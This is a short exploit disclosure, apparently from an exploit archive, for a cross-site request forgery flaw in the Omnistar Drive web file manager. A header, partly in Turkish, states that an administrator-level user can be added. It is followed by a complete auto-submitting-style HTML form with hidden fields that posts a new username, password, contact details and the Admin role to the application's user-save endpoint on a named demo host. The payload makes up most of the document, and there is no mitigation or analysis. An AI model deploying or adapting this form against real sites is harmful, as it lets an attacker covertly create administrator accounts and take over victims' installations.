< ------------------- header data start ------------------- >


#############################################################

# Application Name : Omnistar Drive - Dynamic Web Based File Manager

# Vulnerable Type : XSRF

# Infection : Administrator Yetkili Yeni User Eklenebilir.

# author : BARCOD3 - Bug Researchers

# Demo : http://test.omnistaretools.com/dmd/

# Home : http://www.ozkanbozkurt.com

#############################################################


< ------------------- header data end of ------------------- >


< -- bug code start -- >

<h3>BARCOD3</h3>
<form name=users_form action=http://test.omnistaretools.com/dmd/index.php?area=main&interface=users&act=edit&sort_by=1&sort_order=ASC&page=1&return_to=@list&act=save&return_to=@list method=post enctype=multipart/form-data>
<input type=hidden name=id value=>
<input type=hidden name=username id=username value=username size=20 maxlength=30 class=input >
<input type=hidden name=password id=password value=passWORD size=20 maxlength=30 class=input>
<input type=hidden name=confirm id=confirm value=passWORD size=20 maxlength=30 class=input>
<input type=hidden name=first_name id=first_name value=NAME size=20 maxlength=30 class=input>
<input type=hidden name=last_name id=last_name value=SURNAME size=20 maxlength=30 class=input>
<input type=hidden name=email id=email value=[email protected] size=30 maxlength=255 class=input>
<input type=hidden name=phone id=phone value=123456789 size=20 maxlength=30 class=input>
<option value=Admin selected=selected ></option></select>
<input type=submit name=users_form value=Save class=submitbutton/>
</form>




< -- bug code end of -- >